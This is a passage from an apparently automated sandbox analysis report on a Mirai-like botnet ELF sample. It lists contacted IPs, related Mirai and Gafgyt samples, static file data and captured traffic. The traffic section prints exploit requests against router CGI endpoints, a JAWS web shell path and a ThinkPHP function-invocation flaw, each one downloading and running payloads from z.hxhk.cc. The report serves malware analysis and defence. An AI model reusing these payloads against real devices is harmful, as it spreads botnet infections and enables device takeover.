http://z.hxhk.cc/gpon443	4lXTg8P7Ih.elf	false	5%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://z.hxhk.cc/sys64.arm7;chmod	4lXTg8P7Ih.elf	false	5%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/soap/encoding/	4lXTg8P7Ih.elf	false		high
http://z.hxhk.cc/comtrend%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20jno%27/&sessionKey=1039230114	4lXTg8P7Ih.elf	false	5%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://z.hxhk.cc/sys64.mpsl;chmod	4lXTg8P7Ih.elf	false	5%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://purenetworks.com/HNAP1/	4lXTg8P7Ih.elf	false	URL Reputation: safe	unknown
http://z.hxhk.cc/sys64.mips;	4lXTg8P7Ih.elf	false	5%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/soap/envelope/	4lXTg8P7Ih.elf	false		high
http://z.hxhk.cc/sys64.mips	4lXTg8P7Ih.elf	false	13%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://z.hxhk.cc/sys64.x86	4lXTg8P7Ih.elf	false	5%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://z.hxhk.cc/adb;	4lXTg8P7Ih.elf	false	5%, Virustotal, Browse Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
60.132.235.243	unknown	Japan	17676	GIGAINFRASoftbankBBCorpJP	false
82.120.248.84	unknown	France	3215	FranceTelecom-OrangeFR	false
200.13.169.244	unknown	El Salvador	27773	MILLICOMCABLEELSALVADORSADECVSV	false
80.169.167.75	unknown	United Kingdom	8220	COLTCOLTTechnologyServicesGroupLimitedGB	false
57.217.20.51	unknown	Belgium	2686	ATGS-MMD-ASUS	false
172.203.49.228	unknown	United States	18747	IFX18747US	false
195.170.35.133	unknown	Russian Federation	8395	EAST-ASRU	false
41.102.161.63	unknown	Algeria	36947	ALGTEL-ASDZ	false
181.136.190.144	unknown	Colombia	13489	EPMTelecomunicacionesSAESPCO	false
41.76.191.222	unknown	Kenya	37225	NETWIDEZA	false
181.13.216.186	unknown	Argentina	7303	TelecomArgentinaSAAR	false
101.249.131.35	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
169.151.182.236	unknown	United States	2386	INS-ASUS	false
169.199.125.17	unknown	United States	23309	CCCOE-NETUS	false
184.150.128.233	unknown	Canada	577	BACOMCA	false
200.40.22.187	unknown	Uruguay	6057	AdministracionNacionaldeTelecomunicacionesUY	false
178.183.111.125	unknown	Poland	5588	GTSCEGTSCentralEuropeAntelGermanyCZ	false
178.183.111.128	unknown	Poland	5588	GTSCEGTSCentralEuropeAntelGermanyCZ	false
88.85.139.119	unknown	Finland	34263	MPYNET-ASMikonkatu16FI	false
206.198.143.100	unknown	United States	20333	OPSUS-NETUS	false
187.106.105.110	unknown	Brazil	28573	CLAROSABR	false
169.228.186.212	unknown	United States	7377	UCSDUS	false
64.254.51.67	unknown	United States	19227	VALNETUS	false
49.213.55.246	unknown	unknown	10098	HENDERSON-HKTowngasTelecommunicationsFixedNetworkLtdetw	false
171.121.162.142	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
172.68.102.136	unknown	United States	13335	CLOUDFLARENETUS	false
57.217.20.46	unknown	Belgium	2686	ATGS-MMD-ASUS	false
95.106.79.103	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
63.105.31.9	unknown	United States	701	UUNETUS	false
181.174.226.70	unknown	Costa Rica	30361	SWIFTWILL2US	false
62.68.231.162	unknown	Egypt	24835	RAYA-ASEG	false
104.235.77.148	unknown	United States	5650	FRONTIER-FRTRUS	false
80.142.30.238	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
82.253.172.201	unknown	France	12322	PROXADFR	false
8.188.166.176	unknown	Singapore	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false
169.15.171.138	unknown	United States	203	CENTURYLINK-LEGACY-LVLT-203US	false
108.95.46.108	unknown	United States	7018	ATT-INTERNET4US	false
35.51.52.77	unknown	United States	36375	UMICH-AS-5US	false
41.143.104.15	unknown	Morocco	36903	MT-MPLSMA	false
112.107.186.95	unknown	Korea Republic of	6619	SAMSUNGSDS-AS-KRSamsungSDSIncKR	false
117.83.134.91	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
82.176.91.225	unknown	Netherlands	15542	ZEELANDNETDELTAFiberNederlandNL	false
90.30.222.130	unknown	France	3215	FranceTelecom-OrangeFR	false
184.105.254.49	unknown	United States	23250	BPS-STAGINGUS	false
83.56.195.56	unknown	Spain	3352	TELEFONICA_DE_ESPANAES	false
119.65.100.115	unknown	Korea Republic of	17858	POWERVIS-AS-KRLGPOWERCOMMKR	false
166.111.47.153	unknown	China	4538	ERX-CERNET-BKBChinaEducationandResearchNetworkCenter	false
156.158.248.194	unknown	Tanzania United Republic of	37133	airtel-tz-asTZ	false
191.74.142.181	unknown	Colombia	26611	COMCELSACO	false
178.129.232.164	unknown	Russian Federation	28812	JSCBIS-ASRU	false
98.54.25.194	unknown	United States	7922	COMCAST-7922US	false
92.243.71.32	unknown	Russian Federation	30968	INFOBOX-ASInfoboxruAutonomousSystemRU	false
166.110.147.116	unknown	Chile	9321	HYUNET-ASHanyangUniversityKR	false
169.114.115.197	unknown	United States	37611	AfrihostZA	false
83.221.125.231	unknown	Italy	20746	ASN-IDCTNOOMINCIT	false
98.101.210.185	unknown	United States	11426	TWC-11426-CAROLINASUS	false
156.68.4.40	unknown	United States	297	AS297US	false
101.10.5.169	unknown	Taiwan; Republic of China (ROC)	24158	TAIWANMOBILE-ASTaiwanMobileCoLtdTW	false
200.239.237.20	unknown	Brazil	10704	MLTelecomBR	false
41.122.114.254	unknown	South Africa	16637	MTNNS-ASZA	false
4.125.80.150	unknown	United States	3356	LEVEL3US	false
98.60.86.99	unknown	United States	7922	COMCAST-7922US	false
206.230.238.117	unknown	United States	21591	NSINOC-KC1US	false
1.178.108.119	unknown	Australia	9723	ISEEK-AS-APiseekCommunicationsPtyLtdAU	false
200.136.79.95	unknown	Brazil	1251	FUNDACAODEAMPAROAPESQUISADOESTADOSAOPAULOBR	false
165.180.16.218	unknown	South Africa	7046	RFC2270-UUNET-CUSTOMERUS	false
178.197.159.191	unknown	Switzerland	3303	SWISSCOMSwisscomSwitzerlandLtdCH	false
197.33.36.82	unknown	Egypt	8452	TE-ASTE-ASEG	false
128.176.72.7	unknown	Germany	680	DFNVereinzurFoerderungeinesDeutschenForschungsnetzese	false
213.224.80.62	unknown	Belgium	6848	TELENET-ASBE	false
172.14.160.182	unknown	United States	7018	ATT-INTERNET4US	false
170.255.151.53	unknown	Belgium	5400	BTGB	false
172.14.160.143	unknown	United States	7018	ATT-INTERNET4US	false
197.55.123.254	unknown	Egypt	8452	TE-ASTE-ASEG	false
156.228.141.218	unknown	Seychelles	328608	Africa-on-Cloud-ASZA	false
62.186.135.104	unknown	European Union	34456	RIALCOM-ASRU	false
95.252.144.217	unknown	Italy	3269	ASN-IBSNAZIT	false
213.236.241.92	unknown	Norway	25400	TELIA-NORWAY-ASTeliaNorwayCoreNetworksNO	false
98.115.21.101	unknown	United States	701	UUNETUS	false
101.35.205.158	unknown	China	132203	TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN	false
24.31.4.221	unknown	United States	40285	NORTHLAND-CABLEUS	false
101.132.101.64	unknown	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false
114.108.48.30	unknown	Korea Republic of	23563	VITSSEN-SUWON-AS-KRTbroadSuwonBroadcastingCorporationK	false
213.91.232.234	unknown	Bulgaria	8866	BTC-ASBULGARIABG	false
219.108.208.32	unknown	Japan	2516	KDDIKDDICORPORATIONJP	false
93.98.186.204	unknown	Saudi Arabia	34397	CYBERIA-RUHCyberiaRiyadhAutonomousSystemSA	false
9.196.2.188	unknown	United States	3356	LEVEL3US	false
181.217.21.226	unknown	Brazil	21826	CorporacionTelemicCAVE	false
149.242.126.231	unknown	Germany	35391	HAUNI-ASDE	false
95.183.142.148	unknown	Turkey	8517	ULAKNETTR	false
83.183.231.127	unknown	Sweden	1257	TELE2EU	false
1.4.188.249	unknown	Thailand	23969	TOT-NETTOTPublicCompanyLimitedTH	false
213.58.107.30	unknown	Portugal	9186	ONILisbonPortugalPT	false
41.157.30.13	unknown	South Africa	37168	CELL-CZA	false
156.249.107.65	unknown	Seychelles	139086	ONL-HKOCEANNETWORKLIMITEDHK	false
172.150.130.194	unknown	United States	7018	ATT-INTERNET4US	false
186.57.171.109	unknown	Argentina	22927	TelefonicadeArgentinaAR	false
169.39.206.185	unknown	Switzerland	37611	AfrihostZA	false
41.60.37.37	unknown	Mauritius	30969	ZOL-ASGB	false
184.42.59.170	unknown	United States	5778	CENTURYLINK-LEGACY-EMBARQ-RCMTUS	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
181.13.216.186	fAhViHnmQs.elf	Get hash	malicious	Mirai	Browse
181.13.216.186	v78XF1DWG0	Get hash	malicious	Mirai	Browse
101.249.131.35	aqua.arm	Get hash	malicious	Gafgyt Mirai	Browse
82.120.248.84	4pXtfzfIaA	Get hash	malicious	Mirai	Browse
169.151.182.236	armv5l-20230706-2014.elf	Get hash	malicious	Unknown	Browse
169.199.125.17	0DvpuXY5Md	Get hash	malicious	Mirai	Browse
80.169.167.75	MD2x0rKtXs	Get hash	malicious	Unknown	Browse
57.217.20.51	KKveTTgaAAsecNNaaaa.arm.elf	Get hash	malicious	Mirai	Browse
57.217.20.51	O0yR6BYAeD	Get hash	malicious	Mirai	Browse
172.203.49.228	OOtCSoKbT8.elf	Get hash	malicious	Mirai	Browse	/tmUnblock.cgi
41.102.161.63	UBzqiWxzhP.elf	Get hash	malicious	Mirai, Moobot	Browse
	zmkFQ1e2TU.elf	Get hash	malicious	Mirai	Browse
	uqmpu1eFjx.elf	Get hash	malicious	Mirai	Browse
	mA7WUZVyyP	Get hash	malicious	Mirai	Browse
	KBp03fsqMc	Get hash	malicious	Mirai	Browse
181.136.190.144	2EgdpgJdKe.elf	Get hash	malicious	Mirai	Browse
181.136.190.144	svrHelper	Get hash	malicious	Mirai	Browse
41.76.191.222	dwjJUHAfle.elf	Get hash	malicious	Mirai	Browse
	ncQZPHpLwl	Get hash	malicious	Mirai	Browse
	qpkpKeDgj7	Get hash	malicious	Mirai	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
GIGAINFRASoftbankBBCorpJP	4M8Yu1QU0d.elf	Get hash	malicious	Unknown	Browse	219.206.62.212
	EnUwCpy04H.elf	Get hash	malicious	Mirai	Browse	60.96.248.139
	Jx14GO9SfG.elf	Get hash	malicious	Mirai	Browse	221.46.34.240
	o0KR5B0IZn.elf	Get hash	malicious	Mirai	Browse	221.87.19.30
	QXc3Y7Ed8m.elf	Get hash	malicious	Mirai	Browse	218.112.65.93
	1PfkUPbqjw.elf	Get hash	malicious	Mirai	Browse	218.136.32.75
	ThOZWVZFbg.elf	Get hash	malicious	Mirai	Browse	221.46.34.247
	wNCWSwl1Lv.elf	Get hash	malicious	Mirai	Browse	219.12.101.196
	4pR4wy3RZI.elf	Get hash	malicious	Mirai, Gafgyt	Browse	219.7.42.17
	jpsyYStHAf.elf	Get hash	malicious	Mirai	Browse	126.9.250.96
COLTCOLTTechnologyServicesGroupLimitedGB	4M8Yu1QU0d.elf	Get hash	malicious	Unknown	Browse	212.74.87.236
	SecuriteInfo.com.ELF.Agent-AIN.6835.26629.elf	Get hash	malicious	Mirai	Browse	158.162.205.98
	SOAkQezXit.elf	Get hash	malicious	Mirai	Browse	193.116.176.206
	SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll	Get hash	malicious	CobaltStrike	Browse	193.228.1.130
	f2XSS2IyI2.elf	Get hash	malicious	Mirai	Browse	212.74.87.251
	2jqVUTButb.elf	Get hash	malicious	Mirai	Browse	85.88.131.252
	p4pU29bYMV.elf	Get hash	malicious	Mirai	Browse	212.35.122.191
	SH9ZM3bC45.elf	Get hash	malicious	Unknown	Browse	213.86.22.176
	g4FOBbCeOU.elf	Get hash	malicious	Mirai	Browse	62.23.59.108
	TCEAHNWlS8.elf	Get hash	malicious	Mirai	Browse	62.96.244.99
MILLICOMCABLEELSALVADORSADECVSV	vb75H26uOr.elf	Get hash	malicious	Mirai	Browse	200.13.169.215
	tOmZunyvIE.elf	Get hash	malicious	Moobot	Browse	179.51.7.112
	G0hFe9p4Zh.elf	Get hash	malicious	Mirai	Browse	200.13.170.143
	Va3dE9D7TT.elf	Get hash	malicious	Mirai	Browse	186.32.91.126
	jew.arm7.elf	Get hash	malicious	Mirai	Browse	186.32.91.149
	H5OpSzd1Q6.elf	Get hash	malicious	Mirai	Browse	200.13.169.232
	k3arm.elf	Get hash	malicious	Mirai	Browse	190.53.135.15
	yCUczQYIGe.elf	Get hash	malicious	Mirai	Browse	190.53.135.36
	dltG0b9lTw.elf	Get hash	malicious	Mirai	Browse	200.13.169.231
	hfJupY4dpE.elf	Get hash	malicious	Mirai	Browse	190.150.47.249
FranceTelecom-OrangeFR	4M8Yu1QU0d.elf	Get hash	malicious	Unknown	Browse	195.25.191.245
	EnUwCpy04H.elf	Get hash	malicious	Mirai	Browse	195.6.166.194
	QXc3Y7Ed8m.elf	Get hash	malicious	Mirai	Browse	92.169.13.131
	1PfkUPbqjw.elf	Get hash	malicious	Mirai	Browse	86.240.156.183
	wNCWSwl1Lv.elf	Get hash	malicious	Mirai	Browse	90.79.77.131
	4DU7NWnERk.elf	Get hash	malicious	Mirai	Browse	90.123.158.199
	4pR4wy3RZI.elf	Get hash	malicious	Mirai, Gafgyt	Browse	86.253.44.193
	jpsyYStHAf.elf	Get hash	malicious	Mirai	Browse	109.210.112.218
	I9DNQsrT8I.elf	Get hash	malicious	Mirai, Gafgyt	Browse	90.11.195.51
	3gueXq7uYl.elf	Get hash	malicious	Mirai	Browse	82.121.140.198

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

Static File Info

General

File type:	ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
Entropy (8bit):	6.840418919619752
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	4lXTg8P7Ih.elf
File size:	148'920 bytes
MD5:	8891c104e3c4a985fd72c0604ae7626b
SHA1:	860ee5229ea8b4b1fe3a0fe2c739b6389d199520
SHA256:	3c0623888b007187d26b30dc40e8b0a862864a2ee87c47b648353c356c9802b0
SHA512:	0f6b3910d67918ed6c6dee65439c202e1b34444d68e931ea9519789880ac4f766514888137d30100b177de1738eeeda47bb922592084b9f7336e8cec1b951a83
SSDEEP:	3072:8HnNCkEhumFUCxsSEbusS70og1uYAFLQs7mIBf7r2jsT4w:8HNYhumdsFqfDPVfvd4w
TLSH:	1EE3AEB4F1B55ED0C25405353A91893C8333F61A60AF2FB6ED818A5FA48FED8B124779
File Content Preview:	.ELF.....................@.4....D......4. ...(...............@...@.x6..x6...............@...@C..@C................Q.td............................././"O.n........#.@........#.@,....o&O.n...l..............................././.../.a"O.!...n...a.b("...q.

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	<unknown>
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x4001a0
Flags:	0x9
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	148480
Section Header Size:	40
Number of Section Headers:	11
Header String Table Index:	10

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x400094	0x94	0x30	0x0	0x6	AX	4
.text	PROGBITS	0x4000e0	0xe0	0x1e740	0x0	0x6	AX	32
.fini	PROGBITS	0x41e820	0x1e820	0x24	0x0	0x6	AX	4
.rodata	PROGBITS	0x41e844	0x1e844	0x4e34	0x0	0x2	A	4
.ctors	PROGBITS	0x434000	0x24000	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x434008	0x24008	0x8	0x0	0x3	WA	4
.data	PROGBITS	0x434014	0x24014	0x398	0x0	0x3	WA	4
.got	PROGBITS	0x4343ac	0x243ac	0x10	0x4	0x3	WA	4
.bss	NOBITS	0x4343bc	0x243bc	0x2704	0x0	0x3	WA	4
.shstrtab	STRTAB	0x0	0x243bc	0x43	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x400000	0x400000	0x23678	0x23678	6.9267	0x5	R E	0x10000	.init .text .fini .rodata
LOAD	0x24000	0x434000	0x434000	0x3bc	0x2ac0	2.6892	0x6	RW	0x10000	.ctors .dtors .data .got .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Network Behavior

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 18, 2024 09:56:50.412920952 CET	192.168.2.23	8.8.8.8	0x19ab	Standard query (0)	z.hxhk.cc	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 18, 2024 09:56:50.511771917 CET	8.8.8.8	192.168.2.23	0x19ab	No error (0)	z.hxhk.cc		31.220.3.125	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.23	35514	172.67.159.224	8080

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:56:51.436033010 CET	124	OUT	POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus. Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.23	33476	172.65.51.0	8080

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:56:54.476705074 CET	124	OUT	POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus. Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.23	42030	172.66.196.91	8080

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:56:56.697515011 CET	124	OUT	POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus. Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.23	45226	172.67.167.127	8080

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:56:56.697559118 CET	124	OUT	POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus. Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.23	35940	98.160.120.121	8080

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:56:56.741142035 CET	124	OUT	POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus. Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.2.23	58700	172.64.236.36	8080

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:56:56.785943985 CET	124	OUT	POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus. Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.23	50272	52.5.233.191	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:56:57.223095894 CET	243	OUT	GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1 User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.2.23	58088	95.211.102.26	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:56:57.267469883 CET	308	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: r00ts3c-owned-you
Mar 18, 2024 09:56:57.447530031 CET	490	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Mon, 18 Mar 2024 08:56:56 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.2.23	52090	38.28.174.40	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:56:57.279537916 CET	243	OUT	GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1 User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8 Connection: keep-alive
Mar 18, 2024 09:56:57.447659016 CET	502	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Mon, 18 Mar 2024 08:56:55 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.23	42010	95.46.117.35	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:56:57.327574968 CET	320	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: r00ts3c-owned-you
Mar 18, 2024 09:56:57.550950050 CET	364	IN	HTTP/1.1 505 HTTP Version not supported Content-Type: text/html; charset=utf-8 Content-Length: 140 Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>505 HTTP Version not supported</title></head><body><center><h1>505 HTTP Version not supported</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.23	48850	49.107.36.197	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:56:57.457901955 CET	243	OUT	GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1 User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8 Connection: keep-alive
